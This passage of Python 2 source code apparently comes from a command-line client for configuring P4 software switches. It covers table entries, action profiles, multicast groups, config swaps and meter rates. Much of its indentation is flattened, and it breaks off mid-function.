        "List tables defined in the P4 program: show_tables"
        self.exactly_n_args(line.split(), 0)
        # TABLES is the module-level registry built from the JSON config;
        # iterate in sorted order for deterministic output
        for table_name in sorted(TABLES):
            print TABLES[table_name].table_str()
    @handle_bad_input
    def do_show_actions(self, line):
        "List actions defined in the P4 program: show_actions"
        self.exactly_n_args(line.split(), 0)
        # ACTIONS is the module-level registry built from the JSON config
        for action_name in sorted(ACTIONS):
            print ACTIONS[action_name].action_str()
    def _complete_tables(self, text):
        # tab-completion over all table names
        return self._complete_res(TABLES, text)
    def _complete_act_profs(self, text):
        # tab-completion over all action profile names
        return self._complete_res(ACTION_PROFS, text)
    @handle_bad_input
    def do_table_show_actions(self, line):
        "List one table's actions as per the P4 program: table_show_actions <table_name>"
        args = line.split()
        self.exactly_n_args(args, 1)
        table_name = args[0]
        table = self.get_res("table", table_name, ResType.table)
        # table.actions maps name -> action; the full Action objects live in
        # the global ACTIONS registry
        for action_name in sorted(table.actions):
            print ACTIONS[action_name].action_str()
    def complete_table_show_actions(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
    @handle_bad_input
    def do_table_info(self, line):
        "Show info about a table: table_info <table_name>"
        args = line.split()
        self.exactly_n_args(args, 1)
        table_name = args[0]
        table = self.get_res("table", table_name, ResType.table)
        print table.table_str()
        # visual separator between the table header and its actions
        print "*" * 80
        for action_name in sorted(table.actions):
            print ACTIONS[action_name].action_str()
    def complete_table_info(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
# used for tables but also for action profiles
def _complete_actions(self, text, table_name = None, res = TABLES):
if not table_name:
actions = sorted(ACTIONS.keys())
elif table_name not in res:
return []
actions = sorted(res[table_name].actions.keys())
if not text:
return actions
return [a for a in actions if a.startswith(text)]
def _complete_table_and_action(self, text, line):
tables = sorted(TABLES.keys())
args = line.split()
args_cnt = len(args)
if args_cnt == 1 and not text:
return self._complete_tables(text)
if args_cnt == 2 and text:
return self._complete_tables(text)
table_name = args[1]
if args_cnt == 2 and not text:
return self._complete_actions(text, table_name)
if args_cnt == 3 and text:
return self._complete_actions(text, table_name)
return []
def _complete_act_prof_and_action(self, text, line):
act_profs = sorted(ACTION_PROFS.keys())
args = line.split()
args_cnt = len(args)
if args_cnt == 1 and not text:
return self._complete_act_profs(text)
if args_cnt == 2 and text:
return self._complete_act_profs(text)
act_prof_name = args[1]
if args_cnt == 2 and not text:
return self._complete_actions(text, act_prof_name, ACTION_PROFS)
if args_cnt == 3 and text:
return self._complete_actions(text, act_prof_name, ACTION_PROFS)
return []
    # for debugging
    def print_set_default(self, table_name, action_name, runtime_data):
        # debug helper: echo exactly what is about to be sent to the switch
        print "Setting default action of", table_name
        print "{0:20} {1}".format("action:", action_name)
        print "{0:20} {1}".format(
            "runtime data:",
            "\t".join(printable_byte_str(d) for d in runtime_data)
        )
@handle_bad_input
def do_table_set_default(self, line):
"Set default action for a match table: table_set_default <table name> <action name> <action parameters>"
args = line.split()
self.at_least_n_args(args, 2)
table_name, action_name = args[0], args[1]
table = self.get_res("table", table_name, ResType.table)
action = table.get_action(action_name)
if action is None:
raise UIn_Error(
"Table %s has no action %s" % (table_name, action_name)
)
if len(args[2:]) != action.num_params():
raise UIn_Error(
"Action %s needs %d parameters" % (action_name, action.num_params())
)
runtime_data = parse_runtime_data(action, args[2:])
self.print_set_default(table_name, action_name, runtime_data)
self.client.bm_mt_set_default_action(0, table.name, action.name, runtime_data)
    def complete_table_set_default(self, text, line, start_index, end_index):
        # tab-completion: <table name> then <action name>
        return self._complete_table_and_action(text, line)
@handle_bad_input
def do_table_reset_default(self, line):
"Reset default entry for a match table: table_reset_default <table name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
self.client.bm_mt_reset_default_entry(0, table.name)
    def complete_table_reset_default(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
def parse_runtime_data(self, action, action_params):
if len(action_params) != action.num_params():
raise UIn_Error(
"Action %s needs %d parameters" % (action.name, action.num_params())
)
return parse_runtime_data(action, action_params)
    # for debugging
    def print_table_add(self, match_key, action_name, runtime_data):
        # debug helper: echo the parsed entry before it is sent to the switch
        print "{0:20} {1}".format(
            "match key:",
            "\t".join(d.to_str() for d in match_key)
        )
        print "{0:20} {1}".format("action:", action_name)
        print "{0:20} {1}".format(
            "runtime data:",
            "\t".join(printable_byte_str(d) for d in runtime_data)
        )
    @handle_bad_input
    def do_table_num_entries(self, line):
        "Return the number of entries in a match table (direct or indirect): table_num_entries <table name>"
        args = line.split()
        self.exactly_n_args(args, 1)
        table_name = args[0]
        table = self.get_res("table", table_name, ResType.table)
        print self.client.bm_mt_get_num_entries(0, table.name)
    def complete_table_num_entries(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
@handle_bad_input
def do_table_clear(self, line):
"Clear all entries in a match table (direct or indirect), but not the default entry: table_clear <table name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
self.client.bm_mt_clear_entries(0, table.name, False)
    def complete_table_clear(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
@handle_bad_input
def do_table_add(self, line):
"Add entry to a match table: table_add <table name> <action name> <match fields> => <action parameters> [priority]"
args = line.split()
self.at_least_n_args(args, 3)
table_name, action_name = args[0], args[1]
table = self.get_res("table", table_name, ResType.table)
action = table.get_action(action_name)
if action is None:
raise UIn_Error(
"Table %s has no action %s" % (table_name, action_name)
)
if table.match_type in {MatchType.TERNARY, MatchType.RANGE}:
try:
priority = int(args.pop(-1))
except:
raise UIn_Error(
"Table is ternary, but could not extract a valid priority from args"
)
else:
priority = 0
for idx, input_ in enumerate(args[2:]):
if input_ == "=>": break
idx += 2
match_key = args[2:idx]
action_params = args[idx+1:]
if len(match_key) != table.num_key_fields():
raise UIn_Error(
"Table %s needs %d key fields" % (table_name, table.num_key_fields())
)
runtime_data = self.parse_runtime_data(action, action_params)
match_key = parse_match_key(table, match_key)
print "Adding entry to", MatchType.to_str(table.match_type), "match table", table_name
# disable, maybe a verbose CLI option?
self.print_table_add(match_key, action_name, runtime_data)
entry_handle = self.client.bm_mt_add_entry(
0, table.name, match_key, action.name, runtime_data,
BmAddEntryOptions(priority = priority)
)
print "Entry has been added with handle", entry_handle
    def complete_table_add(self, text, line, start_index, end_index):
        # tab-completion: <table name> then <action name>
        return self._complete_table_and_action(text, line)
@handle_bad_input
def do_table_set_timeout(self, line):
"Set a timeout in ms for a given entry; the table has to support timeouts: table_set_timeout <table_name> <entry handle> <timeout (ms)>"
args = line.split()
self.exactly_n_args(args, 3)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
if not table.support_timeout:
raise UIn_Error(
"Table {} does not support entry timeouts".format(table_name))
try:
entry_handle = int(args[1])
except:
raise UIn_Error("Bad format for entry handle")
try:
timeout_ms = int(args[2])
except:
raise UIn_Error("Bad format for timeout")
print "Setting a", timeout_ms, "ms timeout for entry", entry_handle
self.client.bm_mt_set_entry_ttl(0, table.name, entry_handle, timeout_ms)
    def complete_table_set_timeout(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
@handle_bad_input
def do_table_modify(self, line):
"Add entry to a match table: table_modify <table name> <action name> <entry handle> [action parameters]"
args = line.split()
self.at_least_n_args(args, 3)
table_name, action_name = args[0], args[1]
table = self.get_res("table", table_name, ResType.table)
action = table.get_action(action_name)
if action is None:
raise UIn_Error(
"Table %s has no action %s" % (table_name, action_name)
)
try:
entry_handle = int(args[2])
except:
raise UIn_Error("Bad format for entry handle")
action_params = args[3:]
if args[3] == "=>":
# be more tolerant
action_params = args[4:]
runtime_data = self.parse_runtime_data(action, action_params)
print "Modifying entry", entry_handle, "for", MatchType.to_str(table.match_type), "match table", table_name
entry_handle = self.client.bm_mt_modify_entry(
0, table.name, entry_handle, action.name, runtime_data
)
    def complete_table_modify(self, text, line, start_index, end_index):
        # tab-completion: <table name> then <action name>
        return self._complete_table_and_action(text, line)
@handle_bad_input
def do_table_delete(self, line):
"Delete entry from a match table: table_delete <table name> <entry handle>"
args = line.split()
self.exactly_n_args(args, 2)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
try:
entry_handle = int(args[1])
except:
raise UIn_Error("Bad format for entry handle")
print "Deleting entry", entry_handle, "from", table_name
self.client.bm_mt_delete_entry(0, table.name, entry_handle)
    def complete_table_delete(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
def check_indirect(self, table):
if table.type_ not in {TableType.indirect, TableType.indirect_ws}:
raise UIn_Error("Cannot run this command on non-indirect table")
def check_indirect_ws(self, table):
if table.type_ != TableType.indirect_ws:
raise UIn_Error(
"Cannot run this command on non-indirect table,"\
" or on indirect table with no selector")
def check_act_prof_ws(self, act_prof):
if not act_prof.with_selection:
raise UIn_Error(
"Cannot run this command on an action profile without selector")
    @handle_bad_input
    def do_act_prof_create_member(self, line):
        "Add a member to an action profile: act_prof_create_member <action profile name> <action_name> [action parameters]"
        args = line.split()
        self.at_least_n_args(args, 2)
        act_prof_name, action_name = args[0], args[1]
        act_prof = self.get_res("action profile", act_prof_name,
                                ResType.action_prof)
        action = act_prof.get_action(action_name)
        if action is None:
            raise UIn_Error("Action profile '{}' has no action '{}'".format(
                act_prof_name, action_name))
        # everything after the action name is an action parameter;
        # parse_runtime_data validates the count
        action_params = args[2:]
        runtime_data = self.parse_runtime_data(action, action_params)
        mbr_handle = self.client.bm_mt_act_prof_add_member(
            0, act_prof.name, action.name, runtime_data)
        print "Member has been created with handle", mbr_handle
    def complete_act_prof_create_member(self, text, line, start_index, end_index):
        # tab-completion: <action profile name> then <action name>
        return self._complete_act_prof_and_action(text, line)
    @deprecated_act_prof("act_prof_create_member")
    def do_table_indirect_create_member(self, line):
        "Add a member to an indirect match table: table_indirect_create_member <table name> <action_name> [action parameters]"
        # body intentionally empty: the decorator rewrites the arguments and
        # forwards to do_act_prof_create_member
        pass
    def complete_table_indirect_create_member(self, text, line, start_index, end_index):
        # tab-completion: <table name> then <action name>
        return self._complete_table_and_action(text, line)
@handle_bad_input
def do_act_prof_delete_member(self, line):
"Delete a member in an action profile: act_prof_delete_member <action profile name> <member handle>"
args = line.split()
self.exactly_n_args(args, 2)
act_prof_name, action_name = args[0], args[1]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
try:
mbr_handle = int(args[1])
except:
raise UIn_Error("Bad format for member handle")
self.client.bm_mt_act_prof_delete_member(0, act_prof.name, mbr_handle)
    def complete_act_prof_delete_member(self, text, line, start_index, end_index):
        # tab-completion over action profile names
        return self._complete_act_profs(text)
    @deprecated_act_prof("act_prof_delete_member")
    def do_table_indirect_delete_member(self, line):
        "Delete a member in an indirect match table: table_indirect_delete_member <table name> <member handle>"
        # body intentionally empty: the decorator forwards to
        # do_act_prof_delete_member
        pass
    def complete_table_indirect_delete_member(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
@handle_bad_input
def do_act_prof_modify_member(self, line):
"Modify member in an action profile: act_prof_modify_member <action profile name> <action_name> <member_handle> [action parameters]"
args = line.split()
self.at_least_n_args(args, 3)
act_prof_name, action_name = args[0], args[1]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
action = act_prof.get_action(action_name)
if action is None:
raise UIn_Error("Action profile '{}' has no action '{}'".format(
act_prof_name, action_name))
try:
mbr_handle = int(args[2])
except:
raise UIn_Error("Bad format for member handle")
action_params = args[3:]
if args[3] == "=>":
# be more tolerant
action_params = args[4:]
runtime_data = self.parse_runtime_data(action, action_params)
mbr_handle = self.client.bm_mt_act_prof_modify_member(
0, act_prof.name, mbr_handle, action.name, runtime_data)
    def complete_act_prof_modify_member(self, text, line, start_index, end_index):
        # tab-completion: <action profile name> then <action name>
        return self._complete_act_prof_and_action(text, line)
    @deprecated_act_prof("act_prof_modify_member")
    def do_table_indirect_modify_member(self, line):
        "Modify member in an indirect match table: table_indirect_modify_member <table name> <action_name> <member_handle> [action parameters]"
        # body intentionally empty: the decorator forwards to
        # do_act_prof_modify_member
        pass
    def complete_table_indirect_modify_member(self, text, line, start_index, end_index):
        # tab-completion: <table name> then <action name>
        return self._complete_table_and_action(text, line)
def indirect_add_common(self, line, ws=False):
args = line.split()
self.at_least_n_args(args, 2)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
if ws:
self.check_indirect_ws(table)
else:
self.check_indirect(table)
if table.match_type in {MatchType.TERNARY, MatchType.RANGE}:
try:
priority = int(args.pop(-1))
except:
raise UIn_Error(
"Table is ternary, but could not extract a valid priority from args"
)
else:
priority = 0
for idx, input_ in enumerate(args[1:]):
if input_ == "=>": break
idx += 1
match_key = args[1:idx]
if len(args) != (idx + 2):
raise UIn_Error("Invalid arguments, could not find handle")
handle = args[idx+1]
try:
handle = int(handle)
except:
raise UIn_Error("Bad format for handle")
match_key = parse_match_key(table, match_key)
print "Adding entry to indirect match table", table.name
return table.name, match_key, handle, BmAddEntryOptions(priority = priority)
    @handle_bad_input
    def do_table_indirect_add(self, line):
        "Add entry to an indirect match table: table_indirect_add <table name> <match fields> => <member handle> [priority]"
        # parsing shared with the with_group variant
        table_name, match_key, handle, options = self.indirect_add_common(line)
        entry_handle = self.client.bm_mt_indirect_add_entry(
            0, table_name, match_key, handle, options
        )
        print "Entry has been added with handle", entry_handle
    def complete_table_indirect_add(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
    @handle_bad_input
    def do_table_indirect_add_with_group(self, line):
        "Add entry to an indirect match table: table_indirect_add_with_group <table name> <match fields> => <group handle> [priority]"
        # (help text fixed: it used to show the wrong command name)
        table_name, match_key, handle, options = self.indirect_add_common(line, ws=True)
        entry_handle = self.client.bm_mt_indirect_ws_add_entry(
            0, table_name, match_key, handle, options
        )
        print "Entry has been added with handle", entry_handle
    def complete_table_indirect_add_with_group(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
@handle_bad_input
def do_table_indirect_delete(self, line):
"Delete entry from an indirect match table: table_indirect_delete <table name> <entry handle>"
args = line.split()
self.exactly_n_args(args, 2)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
self.check_indirect(table)
try:
entry_handle = int(args[1])
except:
raise UIn_Error("Bad format for entry handle")
print "Deleting entry", entry_handle, "from", table_name
self.client.bm_mt_indirect_delete_entry(0, table.name, entry_handle)
    def complete_table_indirect_delete(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
def indirect_set_default_common(self, line, ws=False):
args = line.split()
self.exactly_n_args(args, 2)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
if ws:
self.check_indirect_ws(table)
else:
self.check_indirect(table)
try:
handle = int(args[1])
except:
raise UIn_Error("Bad format for handle")
return table.name, handle
@handle_bad_input
def do_table_indirect_set_default(self, line):
"Set default member for indirect match table: table_indirect_set_default <table name> <member handle>"
table_name, handle = self.indirect_set_default_common(line)
self.client.bm_mt_indirect_set_default_member(0, table_name, handle)
    def complete_table_indirect_set_default(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
    @handle_bad_input
    def do_table_indirect_set_default_with_group(self, line):
        "Set default group for indirect match table: table_indirect_set_default_with_group <table name> <group handle>"
        # (help text fixed: it used to show the wrong command name)
        table_name, handle = self.indirect_set_default_common(line, ws=True)
        self.client.bm_mt_indirect_ws_set_default_group(0, table_name, handle)
    def complete_table_indirect_set_default_with_group(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
@handle_bad_input
def do_table_indirect_reset_default(self, line):
"Reset default entry for indirect match table: table_indirect_reset_default <table name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
self.client.bm_mt_indirect_reset_default_entry(0, table.name)
    def complete_table_indirect_reset_default(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
    @handle_bad_input
    def do_act_prof_create_group(self, line):
        "Add a group to an action profile: act_prof_create_group <action profile name>"
        # (help-text typo fixed: "pofile" -> "profile")
        args = line.split()
        self.exactly_n_args(args, 1)
        act_prof_name = args[0]
        act_prof = self.get_res("action profile", act_prof_name,
                                ResType.action_prof)
        # groups only exist for action profiles with a selector
        self.check_act_prof_ws(act_prof)
        grp_handle = self.client.bm_mt_act_prof_create_group(0, act_prof.name)
        print "Group has been created with handle", grp_handle
    def complete_act_prof_create_group(self, text, line, start_index, end_index):
        # tab-completion over action profile names
        return self._complete_act_profs(text)
    @deprecated_act_prof("act_prof_create_group", with_selection=True)
    def do_table_indirect_create_group(self, line):
        "Add a group to an indirect match table: table_indirect_create_group <table name>"
        # body intentionally empty: the decorator forwards to
        # do_act_prof_create_group
        pass
    def complete_table_indirect_create_group(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
@handle_bad_input
def do_act_prof_delete_group(self, line):
"Delete a group from an action profile: act_prof_delete_group <action profile name> <group handle>"
args = line.split()
self.exactly_n_args(args, 2)
act_prof_name = args[0]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
self.check_act_prof_ws(act_prof)
try:
grp_handle = int(args[1])
except:
raise UIn_Error("Bad format for group handle")
self.client.bm_mt_act_prof_delete_group(0, act_prof.name, grp_handle)
    def complete_act_prof_delete_group(self, text, line, start_index, end_index):
        # tab-completion over action profile names
        return self._complete_act_profs(text)
    @deprecated_act_prof("act_prof_delete_group", with_selection=True)
    def do_table_indirect_delete_group(self, line):
        "Delete a group: table_indirect_delete_group <table name> <group handle>"
        # body intentionally empty: the decorator forwards to
        # do_act_prof_delete_group
        pass
    def complete_table_indirect_delete_group(self, text, line, start_index, end_index):
        # tab-completion over table names
        return self._complete_tables(text)
@handle_bad_input
def do_act_prof_add_member_to_group(self, line):
    "Add member to group in an action profile: act_prof_add_member_to_group <action profile name> <member handle> <group handle>"
    args = line.split()
    self.exactly_n_args(args, 3)
    act_prof_name = args[0]
    act_prof = self.get_res("action profile", act_prof_name,
                            ResType.action_prof)
    self.check_act_prof_ws(act_prof)
    # narrowed from bare excepts: only int() conversion errors are expected
    try:
        mbr_handle = int(args[1])
    except ValueError:
        raise UIn_Error("Bad format for member handle")
    try:
        grp_handle = int(args[2])
    except ValueError:
        raise UIn_Error("Bad format for group handle")
    self.client.bm_mt_act_prof_add_member_to_group(
        0, act_prof.name, mbr_handle, grp_handle)
def complete_act_prof_add_member_to_group(self, text, line, start_index, end_index):
    # readline tab-completion: suggest action profile names
    return self._complete_act_profs(text)
# Deprecated alias: the decorator forwards to act_prof_add_member_to_group
@deprecated_act_prof("act_prof_add_member_to_group", with_selection=True)
def do_table_indirect_add_member_to_group(self, line):
    "Add member to group: table_indirect_add_member_to_group <table name> <member handle> <group handle>"
    pass
def complete_table_indirect_add_member_to_group(self, text, line, start_index, end_index):
    # readline tab-completion: suggest table names
    return self._complete_tables(text)
@handle_bad_input
def do_act_prof_remove_member_from_group(self, line):
    "Remove member from group in action profile: act_prof_remove_member_from_group <action profile name> <member handle> <group handle>"
    args = line.split()
    self.exactly_n_args(args, 3)
    act_prof_name = args[0]
    act_prof = self.get_res("action profile", act_prof_name,
                            ResType.action_prof)
    self.check_act_prof_ws(act_prof)
    # narrowed from bare excepts: only int() conversion errors are expected
    try:
        mbr_handle = int(args[1])
    except ValueError:
        raise UIn_Error("Bad format for member handle")
    try:
        grp_handle = int(args[2])
    except ValueError:
        raise UIn_Error("Bad format for group handle")
    self.client.bm_mt_act_prof_remove_member_from_group(
        0, act_prof.name, mbr_handle, grp_handle)
def complete_act_prof_remove_member_from_group(self, text, line, start_index, end_index):
    # readline tab-completion: suggest action profile names
    return self._complete_act_profs(text)
# Deprecated alias: the decorator forwards to act_prof_remove_member_from_group
@deprecated_act_prof("act_prof_remove_member_from_group", with_selection=True)
def do_table_indirect_remove_member_from_group(self, line):
    "Remove member from group: table_indirect_remove_member_from_group <table name> <member handle> <group handle>"
    pass
def complete_table_indirect_remove_member_from_group(self, text, line, start_index, end_index):
    # readline tab-completion: suggest table names
    return self._complete_tables(text)
def check_has_pre(self):
    # Guard used by every mc_* command: fail fast when the switch was
    # started without a packet replication engine.
    # NOTE(review): 'PreType.None' only parses under Python 2, where None
    # tokenizes as a plain NAME; this line is a SyntaxError on Python 3.
    if self.pre_type == PreType.None:
        raise UIn_Error(
            "Cannot execute this command without packet replication engine"
        )
def get_mgrp(self, s):
    """Parse a multicast group id string, raising UIn_Error on bad input."""
    try:
        return int(s)
    # narrowed from a bare except: only the conversion error is expected
    except ValueError:
        raise UIn_Error("Bad format for multicast group id")
@handle_bad_input_mc
def do_mc_mgrp_create(self, line):
    "Create multicast group: mc_mgrp_create <group id>"
    self.check_has_pre()
    args = line.split()
    self.exactly_n_args(args, 1)
    mgrp = self.get_mgrp(args[0])
    print "Creating multicast group", mgrp
    mgrp_hdl = self.mc_client.bm_mc_mgrp_create(0, mgrp)
    # the PRE is expected to use the group id itself as the handle
    assert(mgrp == mgrp_hdl)
@handle_bad_input_mc
def do_mc_mgrp_destroy(self, line):
    "Destroy multicast group: mc_mgrp_destroy <group id>"
    self.check_has_pre()
    args = line.split()
    self.exactly_n_args(args, 1)
    mgrp = self.get_mgrp(args[0])
    print "Destroying multicast group", mgrp
    self.mc_client.bm_mc_mgrp_destroy(0, mgrp)
def ports_to_port_map_str(self, ports, description="port"):
    """Convert a list of port-number strings into the reversed bitmap
    string expected by the PRE Thrift API.

    Raises UIn_Error for non-integer, negative or duplicate numbers;
    'description' is only used to word the error messages.
    """
    ports_int = []
    for port_num_str in ports:
        try:
            port_num = int(port_num_str)
        # narrowed from a bare except: only int() conversion can fail
        except ValueError:
            raise UIn_Error("'%s' is not a valid %s number"
                            "" % (port_num_str, description))
        if port_num < 0:
            raise UIn_Error("'%s' is not a valid %s number"
                            "" % (port_num_str, description))
        ports_int.append(port_num)
    ports_int.sort()
    last_port_num = 0
    port_map_str = ""
    for port_num in ports_int:
        # after handling port p, last_port_num == p + 1, so equality with
        # (last_port_num - 1) means the same port appeared twice
        if port_num == (last_port_num - 1):
            raise UIn_Error("Found duplicate %s number '%s'"
                            "" % (description, port_num))
        port_map_str += "0" * (port_num - last_port_num) + "1"
        last_port_num = port_num + 1
    # the bitmap is sent most-significant-port first
    return port_map_str[::-1]
def parse_ports_and_lags(self, args):
    # args[0] is the command-specific first argument (rid / handle);
    # ports follow until an optional '|' separator, then (for
    # SimplePreLAG only) the lag list.
    ports = []
    i = 1
    while (i < len(args) and args[i] != '|'):
        ports.append(args[i])
        i += 1
    port_map_str = self.ports_to_port_map_str(ports)
    if self.pre_type == PreType.SimplePreLAG:
        i += 1
        lags = [] if i == len(args) else args[i:]
        lag_map_str = self.ports_to_port_map_str(lags, description="lag")
    else:
        # PREs without LAG support take no lag map
        lag_map_str = None
    return port_map_str, lag_map_str
@handle_bad_input_mc
def do_mc_node_create(self, line):
    "Create multicast node: mc_node_create <rid> <space-separated port list> [ | <space-separated lag list> ]"
    self.check_has_pre()
    args = line.split()
    self.at_least_n_args(args, 1)
    try:
        rid = int(args[0])
    except:
        raise UIn_Error("Bad format for rid")
    port_map_str, lag_map_str = self.parse_ports_and_lags(args)
    # the lag map argument only exists on the SimplePreLAG client
    if self.pre_type == PreType.SimplePre:
        print "Creating node with rid", rid, "and with port map", port_map_str
        l1_hdl = self.mc_client.bm_mc_node_create(0, rid, port_map_str)
    else:
        print "Creating node with rid", rid, ", port map", port_map_str, "and lag map", lag_map_str
        l1_hdl = self.mc_client.bm_mc_node_create(0, rid, port_map_str, lag_map_str)
    print "node was created with handle", l1_hdl
def get_node_handle(self, s):
    """Parse a multicast node handle string, raising UIn_Error on bad input."""
    try:
        return int(s)
    # narrowed from a bare except: only the conversion error is expected
    except ValueError:
        raise UIn_Error("Bad format for node handle")
@handle_bad_input_mc
def do_mc_node_update(self, line):
    "Update multicast node: mc_node_update <node handle> <space-separated port list> [ | <space-separated lag list> ]"
    self.check_has_pre()
    args = line.split()
    self.at_least_n_args(args, 2)
    l1_hdl = self.get_node_handle(args[0])
    port_map_str, lag_map_str = self.parse_ports_and_lags(args)
    # the lag map argument only exists on the SimplePreLAG client
    if self.pre_type == PreType.SimplePre:
        print "Updating node", l1_hdl, "with port map", port_map_str
        self.mc_client.bm_mc_node_update(0, l1_hdl, port_map_str)
    else:
        print "Updating node", l1_hdl, "with port map", port_map_str, "and lag map", lag_map_str
        self.mc_client.bm_mc_node_update(0, l1_hdl, port_map_str, lag_map_str)
@handle_bad_input_mc
def do_mc_node_associate(self, line):
    "Associate node to multicast group: mc_node_associate <group handle> <node handle>"
    self.check_has_pre()
    args = line.split()
    self.exactly_n_args(args, 2)
    mgrp = self.get_mgrp(args[0])
    l1_hdl = self.get_node_handle(args[1])
    print "Associating node", l1_hdl, "to multicast group", mgrp
    self.mc_client.bm_mc_node_associate(0, mgrp, l1_hdl)
@handle_bad_input_mc
def do_mc_node_dissociate(self, line):
"Dissociate node from multicast group: mc_node_associate <group handle> <node handle>"
self.check_has_pre()
args = line.split()
self.exactly_n_args(args, 2)
mgrp = self.get_mgrp(args[0])
l1_hdl = self.get_node_handle(args[1])
print "Dissociating node", l1_hdl, "from multicast group", mgrp
self.mc_client.bm_mc_node_dissociate(0, mgrp, l1_hdl)
@handle_bad_input_mc
def do_mc_node_destroy(self, line):
"Destroy multicast node: mc_node_destroy <node handle>"
self.check_has_pre()
args = line.split()
self.exactly_n_args(args, 1)
l1_hdl = int(line.split()[0])
print "Destroying node", l1_hdl
self.mc_client.bm_mc_node_destroy(0, l1_hdl)
@handle_bad_input_mc
def do_mc_set_lag_membership(self, line):
    "Set lag membership of port list: mc_set_lag_membership <lag index> <space-separated port list>"
    self.check_has_pre()
    if self.pre_type != PreType.SimplePreLAG:
        raise UIn_Error(
            "Cannot execute this command with this type of PRE,"\
            " SimplePreLAG is required"
        )
    args = line.split()
    self.at_least_n_args(args, 2)
    try:
        lag_index = int(args[0])
    except:
        raise UIn_Error("Bad format for lag index")
    # NOTE(review): args[1:] are port numbers, but description="lag" makes
    # a bad port report "not a valid lag number" -- confirm this wording
    port_map_str = self.ports_to_port_map_str(args[1:], description="lag")
    print "Setting lag membership:", lag_index, "<-", port_map_str
    self.mc_client.bm_mc_set_lag_membership(0, lag_index, port_map_str)
@handle_bad_input_mc
def do_mc_dump(self, line):
    "Dump entries in multicast engine"
    self.check_has_pre()
    json_dump = self.mc_client.bm_mc_get_entries(0)
    try:
        mc_json = json.loads(json_dump)
    except:
        print "Exception when retrieving MC entries"
        return
    # index L1 (node) and L2 (port/lag map) objects by handle for lookup
    l1_handles = {}
    for h in mc_json["l1_handles"]:
        l1_handles[h["handle"]] = (h["rid"], h["l2_handle"])
    l2_handles = {}
    for h in mc_json["l2_handles"]:
        l2_handles[h["handle"]] = (h["ports"], h["lags"])
    print "=========="
    print "MC ENTRIES"
    for mgrp in mc_json["mgrps"]:
        print "**********"
        mgid = mgrp["id"]
        print "mgrp({})".format(mgid)
        for L1h in mgrp["l1_handles"]:
            rid, L2h = l1_handles[L1h]
            print "  -> (L1h={}, rid={})".format(L1h, rid),
            ports, lags = l2_handles[L2h]
            print "-> (ports=[{}], lags=[{}])".format(
                ", ".join([str(p) for p in ports]),
                ", ".join([str(l) for l in lags]))
    print "=========="
    print "LAGS"
    if "lags" in mc_json:
        for lag in mc_json["lags"]:
            print "lag({})".format(lag["id"]),
            # NOTE(review): 'ports' here is the stale value left over from
            # the mgrp loop above, not this lag's own ports -- this looks
            # like a bug; presumably the lag entry carries its own port
            # list that should be printed instead. Verify against the
            # bm_mc_get_entries JSON schema before fixing.
            print "-> ports=[{}]".format(", ".join([str(p) for p in ports]))
    else:
        print "None for this PRE type"
    print "=========="
@handle_bad_input
def do_load_new_config_file(self, line):
"Load new json config: load_new_config_file <path to .json file>"
args = line.split()
self.exactly_n_args(args, 1)
filename = args[0]
if not os.path.isfile(filename):
raise UIn_Error("Not a valid filename")
print "Loading new Json config"
with open(filename, 'r') as f:
json_str = f.read()
try:
json.loads(json_str)
except:
raise UIn_Error("Not a valid JSON file")
self.client.bm_load_new_config(json_str)
load_json_str(json_str)
@handle_bad_input
def do_swap_configs(self, line):
    "Swap the 2 existing configs, need to have called load_new_config_file before"
    print "Swapping configs"
    self.client.bm_swap_configs()
@handle_bad_input
def do_meter_array_set_rates(self, line):
    "Configure rates for an entire meter array: meter_array_set_rates <name> <rate_1>:<burst_1> <rate_2>:<burst_2> ..."
    args = line.split()
    self.at_least_n_args(args, 1)
    meter_name = args[0]
    meter = self.get_res("meter", meter_name, ResType.meter_array)
    rates = args[1:]
    # one <rate>:<burst> pair must be supplied per meter rate
    if len(rates) != meter.rate_count:
        raise UIn_Error(
            "Invalid number of rates, expected %d but got %d"\
            % (meter.rate_count, len(rates))
        )
    new_rates = []
    for rate in rates:
        try:
            r, b = rate.split(':')
            r = float(r)  # info rate (units per microsecond)
            b = int(b)    # burst size
            new_rates.append(BmMeterRateConfig(r, b))
        except:
            raise UIn_Error("Error while parsing rates")
    self.client.bm_meter_array_set_rates(0, meter.name, new_rates)
def complete_meter_array_set_rates(self, text, line, start_index, end_index):
    # readline tab-completion: suggest meter array names
    return self._complete_meters(text)
@handle_bad_input
def do_meter_set_rates(self, line):
    "Configure rates for a meter: meter_set_rates <name> <index> <rate_1>:<burst_1> <rate_2>:<burst_2> ..."
    args = line.split()
    self.at_least_n_args(args, 2)
    meter_name = args[0]
    meter = self.get_res("meter", meter_name, ResType.meter_array)
    try:
        index = int(args[1])
    except:
        raise UIn_Error("Bad format for index")
    rates = args[2:]
    if len(rates) != meter.rate_count:
        raise UIn_Error(
